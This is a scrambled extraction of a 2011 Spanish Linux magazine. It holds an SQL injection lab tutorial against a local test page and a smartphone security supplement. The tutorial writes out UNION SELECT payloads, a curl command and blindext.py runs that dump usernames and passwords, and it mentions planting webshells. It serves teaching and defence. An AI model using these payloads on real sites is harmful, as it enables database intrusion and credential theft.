%28%29,version%28%29,3­
injection, como :
ht p:/ 192.168.0.113/buggy.php?id=­
Como pueden observar, con esta ­ Listar Archivos del sistema
1%20union%20select%201,2,3­
consulta quiero averiguar la versión operativo
de la base de datos, y el nombre de
esta. El resultado de esto es:
esto, nos daría la siguiente
­ Escribir Archivos dentro del
respuesta en el browser (Figura 2)
sistema operativo, por ejemplo en el
Nombre de Base de datos: tuxinfo
webserver, que podrían en ese caso
Fíjense, que nos aparecieron dos
traer como consecuencia una
números en el campo user_id, y Versión de la base de datos: 5.1.49­ webshel (Recuerden los comandos
username, 1 y 2, ahora con esto, 3
exec, passthru, system de php!).
¿qué haremos? ¡Esto significa que
estos campos son injectables! Ahora, lo que quiero averiguar, es el ­ Se los dejo como tarea del hogar,
Vamos a hacer uso de eso, para ver nombre del usuario con el que está o en todo caso, lo practican ustedes.
un ejemplo. Pondré sólo un ejemplo cor iendo esta db (Figura 4)
con salida de browser, los demás los
Volviendo al tema que nos
31 www.tuxinfo.com.ar




1%20union%20select%201,group_c
oncat%28column_name%29,3%20F
ROM%20information_schema.colum
ns%20where%20table_name=0x757
3657273­
Ustedes se preguntarán ¿qué es el
Figura 5
0x7573657273 ?
Esta es la representación en
hexadecimal de users, para
averiguarlo, hacemos la siguiente
consulta (¡Gracias Sebastián
Romero por el tip!).
mysql> select hex("users");
Figura 6
+--------------+
| hex("users") |
+--------------+
| 7573657273

|
+--------------+
1 row in set (0.00 sec)

Y a eso le agregamos el 0x para la
representación en hexadecimal. .
Figura 7
Ahí vemos las columnas (Figura 6)
(No sé por que salió repetida,
ht p:/ 192.168.0.113/buggy.php?id=­
debería revisar), pero las columnas
preocupa. Ya saqué el usuario, la 1%20union%20select%201,group_c
son:
db, sé que tiene root, ¿qué más oncat%28table_name%29,3%20FR
puedo hacer?. .
OM%20information_schema.tables% id, name, password.
20where%20table_schema=databas
Bueno, sin adentrarnos demasiado e%28%29­
Ahora, ¡vamos por los datos finales!,
en MySQL, cosa que les recomiendo
si ya sabemos los nombres de las
si tienen tiempo y ganas, les voy a Ahí (Figura 5) ya tenemos el nombre tablas, ¡vamos por el dump final de
pasar otra consulta, ya para de la DB, la versión, el usuario que esas tablas! (Figura 7)
averiguar mejor qué tabla es la que la cor e, la tabla, ahora vamos a
estamos consultando, y qué tablas listar las columnas de la db.
Y la consulta fue:
hay en la db.
Para eso, con la información que ht p:/ 192.168.0.113/buggy.php?id=­
Usando group_concat
recién acabamos de recolectar, 1%20union%20select%201,group_c
vamos a usarla para listar las oncat%28id,0x7c7c,name,0x7c7c,pa
Bueno, en la siguiente consulta, columnas de una tabla de la db.
ssword%29,3%20FROM%20users­
vamos a ver efectivamente, cuál es
la tabla de la base de datos que Para averiguar las columnas de la ¡ya tenemos todos los datos que
estamos usando, ya sabemos el tabla, debemos ejecutar la siguiente queríamos!
nombre de la base de datos, ahora consulta.
queremos saber el nombre de la
tabla!. Para eso, usamos el ht p:/ 192.168.0.113/buggy.php?id=­
comando de ansi sql group_concat:
32 www.tuxinfo.com.ar

Quiero Línea de comandos, ¡no Her amientas de automatización
siguiendo el mismo log.
tanto navegador!
No puedo dejar este tutorial (muy HTTP/1.1" 200
Sería lógico que me digan, eh, pero elemental, ya que no se explicitan
¿no hay forma de hacer esto mismo las bases de SQL, ni se profundizan Ese 200, viene de los mensajes de
por línea de comandos?. Y la grandes cosas), sin hablar de las estado del protocolo HTTP, y
respuesta es ¡sí!. La forma de her amientas de automatización que significa que la conexión se ha
hacerlo es mediante una hacen todo esto más sencilo. realizado cor ectamente. Esto es,
her amienta muy útil para el manejo Hablaré de estas después de que que la injection fue levada a cabo
de protocolos ht p, entre otros. (Otra nombre un poco de los logs que se en forma exitosa, para el atacante, y
recomendación, es que se estudie el “generan” en nuestro servidor cada para el admin del sitio. una real
netcat, pero eso queda para vez que se manda una SQL pesadila. .
ustedes).
Injection.
Lo que sigue luego, es el user
curl
Por ejemplo, en la última consulta, el agent, o sea, el agente con el que
http://192.168.0.113/buggy.php
log de apache, que nos queda en el se realizó el ataque, acá dice que se
?id=-
1%20union%20select%201,group_c

archivo access.log (En mi caso , por realizó desde un Windows (uuppss,
oncat%28id,0x7c7c,name,0x7c7c,
utilzar Debian, va a estar en estoy probando esto desde un
password%29,3%20FROM%20users--
/var/log/apache/access.log,
en
<title>DEMO DE BLIND SQL
windows sor y :S), y el agente, en
INJECTION</title><h2><center><
sistemas RH o derivados , Centos, este caso, firefox 7.0.1. (Aunque
u>DEMO DE SQL
Fedora,
etc,
es esto puede ser fácilmente
INJECTION<br>PARA TUX
INFO</u><br><br><font
/var/log/ht pd/access.log).
modificable).
color=' #FF0000' >user_id:
</font>1<br><font
192.168.0.105
­
­
color=' #FF0000' >username:
Uds verán, que, cada actividad
</font>1| | administrator| | 12345
[08/Oct/2011:02:25:29 ­0300] "GET queda registrada en el server
6, 2| | j ax0r| | muestra, 3| | otro| | a
/buggy.php?id=­
apache, así que nuestras injections
lgo<br></h2></center>root@hack
: /var/log/apache2#
1%20union%20select%201,group_c
van a quedar registradas, siempre
oncat(id,0x7c7c,name,0x7c7c,passw en el archivo de logs de apache
ord),3%20FROM%20users­
(Salvo que el admin por algún
(En negrita el comando, en letra HTTP/1.1" 200 472 "­" "Mozila/5.0 motivo suicida no actualice el log del
común, el resultado).
(Windows NT 6.1; rv:7.0.1) apache).
Gecko/20100101 Firefox/7.0.1"
El comando en sí, es:
Bueno, ahora que vimos el tema de
Con lo que acá sacamos las los logs, vamos a mostrar una
siguientes conclusiones:
curl
her amienta de automatización,
http://192.168.0.113/buggy.php
lamada blindext.
?id=-
El IP 192.168.0.105, es el que nos
1%20union%20select%201,group_c
oncat%28id,0x7c7c,name,0x7c7c,

hizo el injection:
La bajamos a esta de
password%29,3%20FROM%20users--
Luego, del Método GET, vemos,
www.c0dezone.com/darkc0de/other
Como vemos, con curl, podemos
s/blindext.py
hacer consultas a la página, podría /buggy.php?id=­
automatizarse, es más, existe la 1%20union%20select%201,group_c
lo cor emos con un ­h, para tener
librería libcurl, o extensiones curl oncat(id,0x7c7c,name,0x7c7c,passw más ayuda:
para php, python, ruby, y seguro ord),3%20FROM%20users­
otros lenguajes, para programar y
aprovecharlo al máximo, como Que significa que alguien nos esta
veremos en el próximo pár afo.
queriendo realizar la injection, y
¿sabemos realmente si lo logró?. No
hay problemas, eso lo vamos a ver
33 www.tuxinfo.com.ar


root@hack:~/codes# ./blindext.py -h
Usage: ./blindext.py [options]
rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --schema Enumerate Information_schema Database.
Define: --dump

Extract information from a Database, Table and Column.
Define: --dbs
Shows all databases user has access too.
Define: --fuzz
Fuzz Tables and Columns.
Define: --info
Prints server version, username@location, database name.
Required:
Define: -u

"www.site.com/news.php?id=234"
Define: -s
"truetextinpage"
Modes dump and schema options:
Define: -D

"database_name"
Define: -T
"table_name"
Define: -C
"column_name,column_name..."
Optional:
Define: -r

row to begin extracting info at.
Define: -p
"127.0.0.1:80 or proxy.txt"
Define: -o
"ouput_file_name.txt"
Default:blindextlog.txt
Ex: ./blindext.py --dbs -u "www.site.com/news.php?id=234" -s "textinpage" -o output.txt
Ex: ./blindext.py --fuzz -u "www.site.com/news.php?id=234" -s "textinpage" -p

127.0.0.1:8080
Ex: ./blindext.py --schema -u "www.site.com/news.php?id=234" -s "textinpage" -D catalog
Ex: ./blindext.py --schema -u "www.site.com/news.php?id=234" -s "textinpage" -D catalog -T

orders -p proxy.txt
Ex: ./blindext.py --dump -u "www.site.com/news.php?id=234" -s "textinpage" -D newjoom -T
jos_users -C username,password
Y vemos, que lo primero, es sacar información de la base de datos, eso lo hacemos, con el query string, y un valor
válido, del query string original, sin “injectar”.
Como vemos (Figura 8), tenemos como datos de lo que aparecen de la consulta original, la palabra administrador, que
la vamos a usar para la her amienta. (administrator es la palabra verdadera en la consulta)
Figura 8
34 www.tuxinfo.com.ar

root@hack:~/codes# ./blindext.py --info -u "192.168.0.113/buggy.php?id=1" -s "administrator"
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com

v3.0
|
|
7/2008
blindext.py
|
|
-Blind MySQL v5+ Information_schema Database Enumeration |
|
-Blind MySQL v4+ Data Extractor
|
|
-Blind MySQL v4+ Table & Column Fuzzer
|
| Usage: blindext.py [options]
|
|
-h help
darkc0de.com
|
|---------------------------------------------------------------|
[+] URL: http://192.168.0.113/buggy.php?id=1
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 19:42:36
[0]: 5.1.49-3:root@localhost:tuxinfo

[-] 19:42:37
[-] Total URL Requests 227
[-] Done

Don't forget to check blindextlog.txt
Bueno, como vemos acá, sacamos la siguiente información:
Ya sabemos que la base es mysql, versión 5.1.49­3, y que cor e el usuario root, en localhost, la base de datos tuxinfo.
Ya con esto, podemos seguir usando la her amienta.
Todo muy lindo, pero me lenó de logs,
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),25
,1))>117 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),25
,1))>116 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26
,1))>63 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26
,1))>95 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26
,1))>111 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26
,1))>119 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26
,1))>115 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26
,1))>117 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26
,1))>116 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),27
,1))>63 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET
/buggy.php?id=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),27
,1))>95 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"

35 www.tuxinfo.com.ar

Fíjense, que todos estos logs (y que en realidad, son muchísimos más, fueron tan solo para investigar qué user cor e la
base, la versión, y la db. Imagínense los logs que van a generar, si tratan de bajar más información de la db. Bueno,
hecha la aclaración, sigo avanzando con el tema de mostrar la her amienta de automatización. Queremos averiguar el
esquema de la db que ya averiguamos el nombre, que se lama tuxinfo. Para eso, en el parámetro, cambiamos el –info
por el –schema, y luego, ponemos la base de datos, que es tuxinfo.
root@hack:~/codes# ./blindext.py --schema -u "192.168.0.113/buggy.php?id=1" -s
"administrator" -D tuxinfo
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com

v3.0
|
|
7/2008
blindext.py
|
|
-Blind MySQL v5+ Information_schema Database Enumeration |
|
-Blind MySQL v4+ Data Extractor
|
|
-Blind MySQL v4+ Table & Column Fuzzer
|
| Usage: blindext.py [options]
|
|
-h help
darkc0de.com
|
|---------------------------------------------------------------|
[+] URL: http://192.168.0.113/buggy.php?id=1
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "tuxinfo"
[+] 20:07:52
[+] Number of Rows:

1
[0]: users
[-] 20:07:53
[-] Total URL Requests 59
[-] Done

Don't forget to check blindextlog.txt
Nota: fijarse que todos los logs, quedan en blindextlog.txt. Ahora, vamos a averiguar los campos de la tabla users
(recién averiguada):
root@hack:~/codes# ./blindext.py --schema -u "192.168.0.113/buggy.php?id=1" -s
"administrator" -D tuxinfo -T users

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com

v3.0
|
|
7/2008
blindext.py
|
|
-Blind MySQL v5+ Information_schema Database Enumeration |
|
-Blind MySQL v4+ Data Extractor
|
|
-Blind MySQL v4+ Table & Column Fuzzer
|
| Usage: blindext.py [options]
|
|
-h help
darkc0de.com
|
|---------------------------------------------------------------|
[+] URL: http://192.168.0.113/buggy.php?id=1
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "tuxinfo" and Table "users"
[+] 20:10:38
[+] Number of Rows:

3
[0]: id
[1]: name
[2]: password

[-] 20:10:39
[-] Total URL Requests 137
[-] Done

Don't forget to check blindextlog.txt
36 www.tuxinfo.com.ar

Como vemos, ya sacamos los (dump) de la data final. Base de para poder hacer el volcado final de
campos de la tabla users. datos: tuxinfo, Nombre de tabla: la tabla users, los campos que le
id,name,password. Ahora vamos a users, Campos: id,name,password. estamos indicando.
recopilar los datos que hemos Ahora, vamos a cambiar el
extraído, para hacer ya el volcado parámetro –schema, por el –dump, root@hack:~/codes#
./blindext.py --dump -u "192.168.0.113/buggy.php?id=1" -s "administrator" -D tuxinfo -T users
-C id,name,password
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com

v3.0
|
|
7/2008
blindext.py
|
|
-Blind MySQL v5+ Information_schema Database Enumeration |
|
-Blind MySQL v4+ Data Extractor
|
|
-Blind MySQL v4+ Table & Column Fuzzer
|
| Usage: blindext.py [options]
|
|
-h help
darkc0de.com
|
|---------------------------------------------------------------|
[+] URL: http://192.168.0.113/buggy.php?id=1
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "tuxinfo" Table "users"
[+] and Column(s) ['id', 'name', 'password']
[+] 20:13:43
[+] Number of Rows:

3
[0]: 1:administrator:123456
[1]: 2:jax0r:muestra
[2]: 3:otro:algo

[-] 20:13:44
[-] Total URL Requests 375
[-] Done

Don't forget to check blindextlog.txt
Como vemos, me mostró todos los en realidad (Que es lo fundamental y escribir un fichero en alguna parte
registros, de la tabla users, de la para un ethical hacker).
del OS. También veremos otra
base de datos tuxinfo. Bueno, como
her amienta, lamada SQLmap, y
veníamos hablando, vamos a hacer ­ Muchas veces falan, y no se está dos her amientas más, SQLi Helper
una
comparativa
de
las dando la realidad de lo que pasa con y Havij (Estas se cor en desde
her amientas.
la base
Windows). Asimismo, veremos
como protegernos de estas
Pros
­ Como ya vimos, nos dejan miles de injections, y algo de configuración
logs, porque al tratar de adivinar o de seguridad en PHP. Espero que
­ No se necesita mucho de ver por fuerza bruta ciertas hayan disfrutado de la nota.
conocimiento para poder usarlas
cosas, lenan de logs.
­ Rápidas para ejecutar, e irse a Bueno, como verán, acá ya tienen
hacer otra cosa, y luego regresar a un pantalazo de lo que es sql
Marcelo Guaz ardo
ver los resultados.
injection, de los peligros que
mguaz ardo76@gmail.com
conleva, y de las her amientas de
Senior Unix Administrator
Administrador Linux, Aix,
­ Permite hacer un test en forma automatización de un sql injection.
HPUX y Solaris
desatendida (En algunos casos).­
La segunda parte incluirá
Contras
características más avanzadas de
un sql injection, como imprimir un
­ No se sabe qué se está haciendo fichero si el userdb tiene privilegios,
37 www.tuxinfo.com.ar



suplemento de tecnología móvil ofrecido por Tuxinfo
en este número:
Seguridad en Smartphones
Asus Ess Pad Transformer
b
a
s
a
d
o
e
n
i
m
a
g
e
n
d
e
l
a
w
_
k
e
v
e
n
h
t
p
:
/
w
w
w
.
f
l
i
c
k
r
.
c
o
m
/
p
h
o
t
o
s
/
k
e
v
e
n
l
a
w
/


Seguridad en los
Smartphones
obsceno que a un usuario de un
teléfono haya que informarle de los
riesgos y las medidas de
protección que debe aplicar a su
“electrodoméstico”. ¿Os imagináis
contándole medidas de protección
Hace mucho tiempo que tenía Tengo un ay!fon (y más me vale a vuestros mayores para manejar
como meta personal poder generar estar alerta)
un frigorífico? ¿O para usar un fax?
un informe de seguridad en los
“Tenga cuidado y actualice el
equipos móviles. El tema pasaba
por ChemaAlonso software de su Fax para evitar que
por cómo encarar la tarea, y de
le tire fotos en su intimidad y envíe
alguna manera pensé que la mejor
faxes a todos su amigos”. Es casi
manera sería que hablen los
vergonzoso para el mundo de la
expertos.
Estar en el centro de todas las
miradas siempre hace que salgan tecnología que algo así pasara,
amantes y detractores, y el mundo pero. . ha pasado, y con elo
Para elo me contacté con las del software, eso implicará que el tenemos que vivir. ­ Y ya veremos
empresas de mayor renombre, y número de personas buscando qué pasa con los frigoríficos
que en base a unas preguntas falos a un software crezca a la par cuando se implante definitivamente
(idénticas para cada empresa) que crece la popularidad del la domótica en las viviendas ­
puedan responderlas y además mismo. En el caso de los
sumarles información.
dispositivos móviles es innegable la En el caso de los smartphones, la
popularidad de los terminales inteligencia del terminal tiene un
Como si fuera poco me comuniqué iPhone de Apple, a los que yo, con precio, y ese precio lo tenemos que
con un experto en seguridad de todo mi cariño maligno lamo ay!fon. pagar hoy en día. Si juntamos en el
renombre, como lo es Chema
cocktail un sistema operativo que
Alonso; quien nos generó un Es innegable que conseguir que tradicionalmente no había sido
completo informe con enlaces muy haya gente en las tiendas de Apple objetivo los atacantes como Mac
interesantes.
haciendo cola por pagar 600 USD OS X y que por tanto no se había
por tener un ay!fon es un claro éxito preocupado demasiado por la
Sin más rodeos, aquí va el del mundo del marketing, que se seguridad, le damos un hardware
informe. .
debe casi por completo al inferior al que usa un sistema
malogrado Steve Jobs, quien está operativo de escritorio al uso, con
Ariel M. Corgatel i claro sabía hacer dinero con la lo que limitamos el número de
gente y que lo pagaran a gusto.
protecciones que se pueden
implementar, y le añadimos 20
milones de usuarios que creen que
Centrándonos en el mundo de la se han comprado un
seguridad informática, resulta hasta electrodoméstico,
entonces
tuxmóvil
tuxmovil

tenemos algo explosivo.
certificados digitales, que dejaba uno. . de nivel bajo [10] ¿Por qué
realizar ataques Man in The Middle esta diferencia?
Es por elo que los equipos y a conexiones “seguras” ht p­s con,
empresas de inteligencia compran por ejemplo, sslsnif del gran Moxie Yo creo que BlackBer y no ha roto
los exploits que permiten tomar Marlinspike[6], sin generar ni un el famoso tipping­point en el que se
control remoto de los smartphones único mensaje de alerta. O también atrae a la industria del malware, y a
como iPhone. Navegar por Internet se pudo ver cómo los los security researchers sobre
o seguir un enlace en un cor eo investigadores
de Taddong elos, pero también puede ser que
electrónico recibido en un ay!fon se comprobaron que iPhone no avisa ay!fon (y Android, que merece un
convierte casi en un acto de fe, ya cuando hay una conexión a una red tema completo aparte) se leva las
que versión a versión podemos ver de telefonía sin cifrar [7] o cómo no luces de la pista central. Y con eso
cómo el número de falos de hay manera de forzar conexiones hay que vivir.
seguridad y la criticidad de los de datos de telefonía seguras[8].
mismos es enorme.
Si tienes un ay!fon asume que los
Yo, por mi parte, me volví loco falos de seguridad existen – y
Baste como muestra un botón. En intentando saber por qué no podía muchos ­, que los enemigos
el año 2010 se descubrieron 60 ver cuáles son las redes WiFi existen – y muchos ­, y que las
falos de seguridad en iOS 4 [1], el conocidas a las que mi terminal formas de tomar control sobre todo
sistema operativo de los ay!fon – iPhone se va a conectar lo que hagas, leas o tengas en tu
basado en Mac OS X ­, y sólo en el automáticamente sin comprobar el ay!fon existen – y muchas – así
salto a la versión 5 se han BSSID de la red, lo que le hace que. . estáte alerta.
cor egido 98 falos de seguridad[2], vulnerable a ataques de falsos
la mayoría de elos en el webkit, es puntos de acceso (Rogue AP) de la
decir, a tiro de visitar la página web forma más tierna que se pueda
equivocada.
hacer [9].
ChemaAlonso
Security Researcher en
Informática 64
Lo más curioso es que, por ¿Alguno de vosotros ha consultado
Microsoft MVP en
desgracia para los usuarios de un el número de falos de seguridad
Enterprise Security
iPhone, es que los terminales son conocidos en el software de
chema@informatica64.com
abandonados sin soporte para BlackBer y? Pues mientras que iOS
twit er: @chemaalonso
parches de seguridad a los 2 años supera el centenar de bugs
ht p:/ www.el adodelmal.com
de vida, algunos incluso, vendidos conocidos durante el año 2011, en
ht p:/ www.informatica64.com
de forma más tardía por operadoras el software de las BlackBer y este
de telefonía con garantía de año no se ha descubierto ninguno,
permanencia más alá del periodo y en el año 2010 se descubrió
en el que van a tener parches de
seguridad porApple [3].
[1] “Apple, el fabricante de software con más vulnerabildades según CISCO, será
objetivo de ataques en 2011”
ht p:/ www.seguridadapple.com/2011/01/apple­el­fabricante­de­software­con­mas.html
Pero es que además, sólo durante
[2] “iOS 5: Novedades en seguridad para iPhone e iPad”
ht p:/ www.seguridadapple.com/2011/10/ios­5­novedades­en­seguridad­para.html
este último año han aparecido los
[3] “Permanezca usted inseguro con Claro e iPhone 3G”
exploits de JailbreakMe 3.0 [4], que
ht p:/ www.seguridadapple.com/2011/05/permanezca­usted­inseguro­con­claro­e.html
pueden ser fácilmente modificados
[4] “Apple cier a los bugs explotados en Jailbreakme 3.0”
ht p:/ www.seguridadapple.com/2011/07/apple­cier a­los­bugs­explotados­en.html
por cualquiera para crear, como
[5] “JailOwnMe o cómo mutar JailbreakMe 3.0 y meter una shel”
hizo el investigador José Selvi, su
ht p:/ www.seguridadapple.com/2011/09/jailownme­o­como­mutar­jailbreakme­30­y.html
[6] “Danger: SSLSnif ataca equipos no parcheados a iOS 4.3.5”
propio JailOwnMe[5], ejecutando lo
ht p:/ www.seguridadapple.com/2011/07/danger­sslsnif ­ataca­equipos­no.html
que se quiera en un dispositivo
[7] “iPhone no alerta de conexiones GSM sin cifrar”
iPhone que visite la página web
ht p:/ www.seguridadapple.com/2011/02/iphone­no­alerta­de­conexiones­gsm­sin.html
[8] “Atacando iPhone e iPad con redes falsas GPRS y EDGE”
equivocada. También se publicó el
ht p:/ www.seguridadapple.com/2011/01/atacando­iphone­e­ipad­con­redes­falsas.html
falo en las BasicsConstraints en los
[9] ”Gestión insegura de redes WiFi en iOS”
ht p:/ www.seguridadapple.com/2011/06/gestion­insegura­de­redes­wifi­en­ios.html
[10] “Vulnerabilty Report: BlackBer y Device Software 5.x”
tuxmóvil
­ ht p:/ secunia.com/advisories/product/32505/?task=advisories
tuxmovil


todo la posibildad de utilzar en él entre los cuales podemos
soluciones de seguridad como mencionar la utilzación de un
ESET Mobile Security para proteger código de desbloqueo del equipo,
sus datos. Sólo el 20% de los la descarga de aplicaciones solo
usuarios protege su dispositivo desde sitios oficiales y además
móvil con una solución de deshabiltar los medios de conexión
seguridad lo que deja a un amplio como el Bluethooth o el Wi­Fi en
Seguridad en smartphones
margen de elos vulnerables ante caso de que no los esté utilzando.
por PabloAtilio Ramos, los ataques de los ciber
Especialista en Awarenes & delincuentes.
La seguridad de la información en
Research de ESET Latinoamérica
los dispositivos móviles incluye no
Durante el presente año se han sólo información personal del
detectado y reportado un creciente usuario, sino que también
Los smartphone se presentan número de códigos maliciosos para almacenan datos de sus contactos,
desde hace ya algún tiempo como las plataformas móviles que o acceso a la red de su trabajo.
los sucesores de los teléfonos además de robar datos como el Debido a estas variables es
móviles, en dónde combinan las número de teléfono del usuario, necesario que los usuarios se
lamadas y mensajes de texto con enviar mensajes de texto a número concienticen acerca de las
una conexión a Internet las 24 Premium, pueden convertir el amenazas existentes para las
horas del día y la posibildad de Smartphone en parte de una red de plataformas móviles y de esta
acceder a cor eos electrónicos, equipos zombis controlados de manera mantener segura su
redes sociales y a las cuentas manera remota. Es decir, con el información.
bancarias del usuario. La gran crecimiento en el mercado de estos
cantidad de funcionalidades con las equipos, los desar oladores de 1­ ¿Cómo ve ESET el mercado
que cuentan estos dispositivos códigos
maliciosos
están de los dispositivos móviles?
conleva a que el usuario guarde enfocándose hacia esta plataforma ¿Cuál es el futuro del mismo?
toda su información en un solo en dónde los usuarios suelen creer
lugar, sus contraseñas, sus que no hay amenazas.
Los dispositivos móviles le
contactos e incluso hasta
permiten a los usuarios estar
información confidencial de su Uno de los riesgos más latentes en conectados las 24 horas del día
trabajo. Es de esta manera que lo que respecta a los datos con el objetivo de que puedan
ante la posibildad de que un almacenados en los dispositivos acceder a sus cor eos, las redes
atacante acceda a su información móviles es la información que estos sociales o incluso a navegar por
ya sea mediante el acceso físico al almacenan. En el caso de que al Internet desde la ubicación en la
dispositivo o con la utilzación de un usuario le roben o pierda su equipo, que se encuentren. En la
código malicioso, el usuario debe todos los datos contenidos en él actualidad se están comenzando a
protegerse con una solución de podrían estar comprometidos. utilzar estos dispositivos para el
seguridad como que le permita no Funciones como el Anti­Theft de acceso a las cuentas bancarias de
sólo
detectar
amenazas ESET Mobile Security permiten manera remota, y además ya
informáticas sino también poder realizar el bor ado de toda la existen proyectos que le permitirán
eliminar la información contenida en información a través de un mensaje al usuario realizar pagos con su
el smartphone, mitigando así la de texto, garantizándole al usuario Smartphone como si fuese una
fuga de información.
que el atacante no va a poder tarjeta de crédito. Ante esta gran
acceder a los mismos.
cantidad de funcionalidades es
Entre los principales riesgos que
necesario contar con una solución
cor en los usuarios para proteger Sin embargo, existen también otras de seguridad que permita proteger
su información se encuentra el medidas de seguridad a tomar por los datos del usuario.
desconocimiento de cuáles son las los usuarios para proteger su
amenazas existentes y por sobre equipo y la información contenida 2­ ¿Qué tan importante es para el
tuxmóvil
tuxmovil


usuario contar con un Soft de cantidad de amenazas detectadas En lo que respecta a la seguridad
seguridad para este tipo de es Android. La plataforma móvil de de la información en la nube, tanto
dispositivos? ¿Cuáles son los Google presentó a lo largo del 2011 los usuarios como los proveedores
riesgos a los que se enfrenta un la aparición de una gran cantidad de servicios deben ser consientes
usuario sin ningún Soft?
de códigos maliciosos entre dónde de un manejo conjunto de la
se remarcan amenazas como seguridad. Cuando un servicio
Utilzar una solución de seguridad DroidDream que fue publicado en el aloja la información de los usuarios
en los smartphones es importante Android Market y generó más de debe tener en cuenta a cargo de
para los usuarios ya que además 250.000 infecciones.
quién está la seguridad.
de protegerlo contra los códigos
Básicamente hay dos cuestiones
maliciosos le permite, entre otras Además, la cantidad de troyanos muy importantes. La primera de
cosas, bor ar la información
elas, es dónde está alojada la
contenida en el mismo de manera
información: en un servidor
remota en caso de robo o pérdida
externo. Es decir, en un servidor
del dispositivo. Entre los principales
que es propiedad del proveedor y,
riesgos a los que el usuario se
por lo tanto, información que puede
expone se encuentra el robo de
ser confidencial estará en
información a través de los códigos
propiedad de terceros. Esto no es
maliciosos, ya que la mayoría de
algo que se deba considerar
los códigos maliciosos se
inseguro, pero sin lugar a dudas
encuentran
inyectados
en
esto podría afectar la privacidad de
aplicaciones oficiales que luego son
la compañía, y por ende afectar la
publicados en los repositorios de
confidencialidad de la información.
aplicaciones. De esta manera
mientras el usuario utilza el SMS que realizan el envío de La segunda cuestión está asociada
software, se realiza en un segundo mensajes de texto a números a la seguridad que tengan dicha
plano la ejecución de la sección de Premium sin el consentimiento del información. Aún confiando en la
código que recopila la información y usuario está en aumento y es una confidencialidad del proveedor, un
la envía a servidores maliciosos o de las amenazas más comunes de atacante podría vulnerar sus
envía mensajes de texto a números encontrar para esta plataforma que servidores y obtener todos los
Premium.
son publicadas en repositorios de datos alí alojados, incluidos los de
aplicaciones alternativos. Entre los la propia empresa. Y este es, uno
3­ ¿Qué soluciones presenta principales motivos por los cuales de los aspectos más importantes
ESET y en qué costos? ¿Hay Android es uno de los objetivos sobre la seguridad de la
alguna promoción especial?
principales de los ciber criminales, información y el cloud computing:
es a causa de que es la plataforma al delegar la gestión del servicio,
En este link vas a encontrar todo lo móvil con mayor porcentaje del también se delega la protección de
referido a los productos de Mobile mercado. De esta manera, al los datos. Es ahora la empresa
que hoy se encuentran en el desar olar una amenaza para esta proveedora
quien
debe
mercado:
ht p:/ www.eset­ plataforma y publicarla en el responsabilzarse por proteger los
la.com/hogar/mobile­security­
Android Market o cualquier datos que son de los usuarios.
antivirus
repositorio de aplicaciones, la
cantidad de víctimas que podrían Según datos de ESET
4­ ¿Cuál es el sistema operativo descargar el código malicioso es Latinoamérica el 60% de los
móvil que más amenazas mayor a otras plataformas.
usuarios que ven su información
presenta, y por qué?.
comprometida por un er or en el
5­ Sobre la nube, ¿cuál es la prestador cambian de servicio. De
En la actualidad, el sistema opinión sobre los servicios?
esta manera, podemos remarca la
operativo móvil con la mayor
importancia de confiar en quien
tuxmóvil
tuxmovil


almacena los datos del usuario. Si
trasladamos esta cuestión a los
dispositivos móviles, además de
proteger su información en su
Como empresa de seguridad
Smartphone los usuarios también
informática, McAfee tiene la misión
deben comprender a quién le están
de proteger al usuario en estos
relegando la protección de su Seguridad en smartphones
múltiples accesos, protegiendo
información.
tanto a la persona y su información
Por CarlosAramburu, Consumer
Manager de McAfe para como a la integridad del dispositivo
con el que accede.
6­ ¿Algún tipo de recomendación
Argentina, Uruguay y Paraguay.
para los usuarios móviles?
